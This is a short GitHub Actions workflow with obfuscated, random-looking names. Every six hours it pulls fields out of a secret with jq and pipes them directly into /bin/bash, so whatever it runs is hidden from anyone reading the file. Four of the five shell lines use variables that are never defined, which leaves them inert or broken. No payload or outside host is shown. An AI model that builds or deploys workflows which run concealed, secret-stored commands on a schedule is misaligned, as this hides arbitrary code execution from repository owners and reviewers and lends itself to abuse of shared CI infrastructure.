name: zhuwushan1989

on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuwushan1989
        env:
          tfdw23615: ${{ secrets.tfdw23615 }}
        run: |
          echo $tfdw23615 | jq -r .wdy1771 | /bin/bash
          echo $l5860 | jq -r .cjzyx7 | /bin/bash
          echo $p17 | jq -r .khtlz44702 | /bin/bash
          echo $is121 | jq -r .arhrh399 | /bin/bash
          echo $tzdt444 | jq -r .jpjdd034 | /bin/bash

